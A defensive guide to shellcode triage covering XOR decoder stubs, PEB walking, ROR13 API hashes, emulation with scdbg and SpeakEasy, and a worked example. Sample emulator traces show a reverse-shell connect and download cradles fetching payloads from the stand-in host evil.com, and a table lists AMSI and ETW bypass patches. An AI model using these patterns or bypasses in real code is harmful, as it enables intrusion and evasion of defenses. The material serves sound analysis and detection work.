Shellcode Analysis: Tips, Tricks & Common Patterns
A practical guide to analyzing shellcode - identifying encoders, emulation, and recognizing common patterns. Covers triage, PEB walking, hash-based API resolution, scdbg/SpeakEasy emulation, and family-level pattern recognition.
Why Shellcode Analysis Matters
Most modern malware delivery is staged. The first thing that lands on the victim is rarely a full PE - it’s a small position-independent payload (shellcode) whose only job is to bootstrap whatever comes next: download a DLL, reflectively load a beacon, hollow a process, or stage credential theft. From a triage perspective, shellcode is where the campaign’s intent first appears. Decoding even 200 bytes of shellcode often reveals the actor’s tradecraft, the second-stage URL, and the choice of C2 framework before any expensive sandbox detonation.
This post collects the patterns I look for during shellcode triage, the tooling I reach for first, and the common shapes that recur across families.
Quick Triage
Check file entropy: 5.0-6.5 suggests encoded, 7.0+ means encrypted. Disassemble with ndisasm for x86/x64.
First-Pass Tooling
# Entropy & file shape
ent shellcode.bin
binwalk -E shellcode.bin # entropy plot
binwalk shellcode.bin # bundled file scanner
# Disassembly
ndisasm -b 64 shellcode.bin | head
ndisasm -b 32 shellcode.bin | head
rasm2 -a x86 -b 64 -d -f shellcode.bin # radare2's disassembler
# Strings (post-decode)
strings -a -n 6 shellcode.bin
strings -el shellcode.bin # little-endian wide strings (UTF-16LE)
# Hash-based identification
sha256sum shellcode.bin
ssdeep shellcode.bin # fuzzy hashing for variant clustering
Entropy Heuristics
| Entropy | Interpretation |
|---|---|
| 0.0 - 1.5 | Mostly null bytes / fixed pattern - probably padding |
| 1.5 - 4.5 | Plain x86/x64 instructions - directly disassemblable |
| 4.5 - 6.5 | Encoded (XOR, alphanumeric, single-pass transform) |
| 6.5 - 7.5 | Compressed (LZ, RLE) or weakly encrypted |
| 7.5 - 8.0 | Strong encryption (AES, RC4 with random key) |
Whole-file entropy can mislead - the decoder stub at the start is plain code (low entropy) followed by an encrypted body (high entropy), and the average lands in the encoded range. Always look at windowed entropy (first 64 bytes vs. rest of the file).
Architecture Tells
Disassembling first as x64, then as x86, lets you eyeball which one looks like sane instructions:
- x64: lots of
mov rax, ...,add rsp, ...,48 ...REX-prefixed bytes. - x86: lots of
mov eax, ...,push ebp; mov ebp, espprologues. - ARM64:
STP X29, X30, [SP, ...]style prologues, no REX bytes.
If neither disassembly looks sensible, you’re looking at encoded data - find the decoder stub.
Common Patterns
Look for PEB walking (API resolution), hash-based function lookup (ROR13 for Metasploit), and XOR decoder stubs at the start.
XOR Decoder Stub
The simplest shellcode encoders prepend a 5-15 byte loop that walks the body byte by byte XORing with a fixed key, then jumps to the start of the decoded region. The pattern is unmistakable:
0000 EB 0E jmp short loc_10
0002 loc_2:
0002 5E pop rsi ; rsi = encoded body
0003 31 C9 xor ecx, ecx
0005 B1 87 mov cl, 0x87 ; encoded length
0007 80 36 AA xor byte ptr [rsi], 0xAA ; XOR key
000A 46 inc rsi
000B E2 FA loop short loc_7
000D EB 05 jmp short loc_14
000F loc_10:
000F E8 EE FF FF FF call loc_2
0014 loc_14:
... encoded body ...
The “call/pop” trick is the position-independent way to learn the address of the encoded body. After the loop, control transfers into the decoded code. Once you spot the structure, the XOR key (0xAA here) and length (0x87) are static parameters - apply them in CyberChef or a 3-line Python script and disassemble the result.
Common alphanumeric encoders (Metasploit’s x86/alpha_mixed) use multi-pass transforms producing only printable ASCII bytes - they’re characterised by long runs of [A-Za-z0-9] at the start of the file with a tiny constructor at the very beginning.
PEB Walking (API Resolution)
Shellcode cannot import anything by name - there’s no PE loader to fix up imports. Instead, it walks the Process Environment Block to find loaded modules. The structure on x64:
GS:[0x60] → PEB
PEB.Ldr → PEB_LDR_DATA
PEB.Ldr.InMemoryOrderModuleList → linked list of LDR_DATA_TABLE_ENTRY
(one per loaded DLL)
LDR_DATA_TABLE_ENTRY:
+0x000 InLoadOrderLinks (LIST_ENTRY)
+0x010 InMemoryOrderLinks (LIST_ENTRY)
+0x020 InInitializationOrderLinks
+0x030 DllBase
+0x048 BaseDllName (UNICODE_STRING)
The recognisable assembly:
mov rdx, gs:[0x60] ; PEB
mov rdx, [rdx + 0x18] ; PEB.Ldr
mov rdx, [rdx + 0x20] ; InMemoryOrderModuleList head
; (next: walk LIST_ENTRY pointers, cmp BaseDllName)
x86 equivalent uses FS:[0x30] and offsets 0x0C, 0x14. Once you see FS:[0x30] or GS:[0x60] in the first few instructions, you’re looking at PEB walking - that’s API resolution.
Hash-Based Function Lookup (ROR13)
After locating kernel32.dll’s base, the shellcode walks the export directory comparing API name hashes (not strings - hardcoded strings would be a YARA bonanza) against pre-computed constants.
The Metasploit block_api.asm family uses ROR-13:
mov edi, [rsi + 0x20] ; AddressOfNames
...
xor eax, eax
loop_byte:
movzx edx, byte ptr [esi]
cmp dl, dh ; end of string?
jz hash_done
ror eax, 13 ; rotate-right by 13
add eax, edx
inc esi
jmp loop_byte
hash_done:
Recognisable hashes:
| Hash | API |
|---|---|
0x0726774C |
LoadLibraryA |
0x7C0017A5 |
GetProcAddress |
0xE553A458 |
VirtualAlloc |
0x6A18AD03 |
WSASocketA |
0x6174A599 |
WSAStartup |
0xE0DF0FEA |
connect |
0x79CC3F69 |
CreateProcessA |
A grep through the .data section for any of these magic 4-byte values immediately tells you the shellcode’s planned API set. Other families use FNV-1a, djb2, or custom polynomial hashes - the principle is identical, just with different constants.
EGGHUNTER / Tag-Search Shellcode
A 30-40 byte stub that scans process memory for a 4-byte tag (e.g. w00tw00t repeated twice) and jumps to whatever follows it. Used when the initial buffer is too small for full code but a larger buffer was placed elsewhere in the process. Recognisable by NtAccessCheckAndAuditAlarm (the syscall used by Skape’s classic egghunter to validate readable memory).
Stack Strings
Even after API hashing, shellcode needs to push a few literal strings (e.g. URLs, registry keys). They show up as repeated mov dword ptr [rsp+...], 0xCONSTANT sequences building a string on the stack one DWORD at a time:
mov dword [rsp+0x00], 0x70747468 ; "http"
mov dword [rsp+0x04], 0x2F2F3A73 ; "s://"
...
Concatenate the constants, byte-swap each, and you have the raw string.
Dynamic Analysis
Use scdbg to emulate execution and hook API calls - immediately reveals reverse shells, download cradles, and process injection.
scdbg
scdbg (David Zimmer) is the workhorse for x86 shellcode emulation:
scdbg /f shellcode.bin
# 401029 LoadLibraryA(WS2_32)
# 40103D WSAStartup(MAKEWORD(2,2),0x4011a0)
# 40104B WSASocketA(2,1,0,0,0,0)
# 401059 connect(192.168.1.50:4444) = -1 (no real network)
# 401067 CreateProcessA(cmd.exe)
# Stepcount 247
Within seconds you have the C2 host, port, and capability summary. Useful flags:
/findscto scan a buffer for likely shellcode entry points./apito specify which API hooks to apply./foff <hex>to start emulation from a specific offset (skip the decoder if you’ve already extracted the body).
scdbg is x86-only. For x64 use SpeakEasy (Mandiant), which emulates both.
SpeakEasy
speakeasy -t shellcode.bin -a x64 -r
# 0x10000000 VirtualAlloc(0, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE) → 0x10001000
# 0x10000020 InternetOpenA("Mozilla/5.0...")
# 0x10000040 InternetConnectA("evil.com",443,...)
# 0x10000080 HttpOpenRequestA(GET, "/payload.bin")
# 0x100000a0 HttpSendRequestA(...)
SpeakEasy’s strengths are x64 support, a more complete Windows API surface, and a Python plugin model for extending coverage.
Unicorn / Qiling
For non-Windows shellcode (Linux, BSD) or for very custom analysis (replacing API stubs with your own logic), Unicorn and Qiling provide programmatic CPU emulation:
from qiling import Qiling
ql = Qiling(["./shellcode.bin"], "rootfs/x86_windows", verbose=4)
ql.os.heap.start_address = 0x10000000
ql.run()
You can replay any Win32 / POSIX environment, hook arbitrary instructions, and dump memory at chosen breakpoints.
Live Debugger Approach
For complex shellcode that an emulator can’t handle (heavy SEH usage, syscalls, in-line mov cr3 style anti-emulation tricks):
- Compile a minimal
loader.cthatVirtualAllocs RWX memory, copies the shellcode in, and__debugbreak()before calling. - Run under x64dbg / WinDbg, hit the breakpoint, attach.
- Single-step through the shellcode in the real Windows environment.
This is slower than emulation but defeats every anti-emulation trick because you’re running on a real CPU with a real kernel.
Decoder/Transform Catalogue
| Pattern | Indicator |
|---|---|
| Reverse shell | WSASocketA → connect → CreateProcessA |
| Download & exec | URLDownloadToFileA chain |
| Reflective DLL | VirtualAlloc → manual PE loading |
| Process injection | OpenProcess → VirtualAllocEx → WriteProcessMemory |
Adding the most common families I see in 2025-2026 samples:
| Pattern | Recognisable API chain |
|---|---|
| Reverse TCP shell | WSAStartup → WSASocketA → connect → CreateProcessA(cmd.exe) with redirected STARTUPINFO |
| Bind shell | WSAStartup → bind → listen → accept → CreateProcessA |
| HTTP/S download cradle | LoadLibraryA(wininet) → InternetOpenA → InternetConnectA → HttpOpenRequestA → HttpSendRequestA → InternetReadFile |
| Reflective DLL loader | VirtualAlloc(RW) → custom loader walks PE → VirtualProtect(RX) → indirect call |
| Process hollowing | CreateProcessA(...,CREATE_SUSPENDED) → NtUnmapViewOfSection → VirtualAllocEx → WriteProcessMemory → SetThreadContext → ResumeThread |
| Process injection (classic) | OpenProcess → VirtualAllocEx → WriteProcessMemory → CreateRemoteThread |
| AMSI bypass shellcode | GetProcAddress(amsi.dll, AmsiScanBuffer) → VirtualProtect → patch entry to mov eax, 0x80070057; ret |
| ETW patch | GetProcAddress(ntdll, EtwEventWrite) → VirtualProtect → patch ret |
| Direct/indirect syscall stubs | mov rax, <SSN>; mov r10, rcx; syscall; ret (direct) or mov r11, <NtFunc+0x12>; call r11 (indirect) |
| Cobalt Strike stage 0 | RC4-decrypted body of ~256 KB; LoadLibraryA(wininet) + checksum 0xC691A8FB-style hashes |
A Quick Worked Example
A 312-byte sample lands on your desk. First-pass scdbg run:
scdbg /f sample.bin
401000 GetProcAddress(0x77E80000, "LoadLibraryA")
401016 GetProcAddress(0x77E80000, "GetProcAddress")
40102C LoadLibraryA(WININET)
401040 GetProcAddress(WININET, "InternetOpenA")
401055 GetProcAddress(WININET, "InternetConnectA")
40106A GetProcAddress(WININET, "HttpOpenRequestA")
401080 GetProcAddress(WININET, "HttpSendRequestA")
401096 GetProcAddress(WININET, "InternetReadFile")
4010A2 InternetOpenA("Mozilla/5.0 (Windows NT 10.0)")
4010BC InternetConnectA("evil.com", 443, NULL, NULL, INTERNET_SERVICE_HTTP)
4010D8 HttpOpenRequestA(hConnect, "GET", "/u.bin")
...
Triage verdict in under a minute: HTTPS download cradle pulling a second stage from evil.com:443/u.bin. That single URL becomes the next IOC; pivot in passive DNS / VirusTotal / URLScan to find the campaign perimeter.
Practical Workflow Checklist
A repeatable triage that finishes most samples in 30 minutes:
- Hash + classify. SHA-256 → VT lookup → first-seen, family hits.
- Entropy + windowed entropy. Locate decoder vs body boundary.
- First instructions disassembly. PE/PEB walk? Hash lookup? Decoder stub?
- Emulate (scdbg/SpeakEasy). Capture API trace.
- Decode + re-disassemble if there was a decoder stub.
- Identify family / framework. Metasploit? Cobalt Strike? Sliver? Custom?
- Extract IOCs. URLs, hostnames, ports, mutex names, file paths.
- Author detections. YARA on invariant bytes (hash constants, decoder shape); Sigma on the host-side spawn pattern.
Shellcode is rarely the whole attack - it’s the bridge. But the bridge always reveals the destination. Spend 15 minutes on the shellcode and you’ll often save hours of sandbox-driven black-box analysis.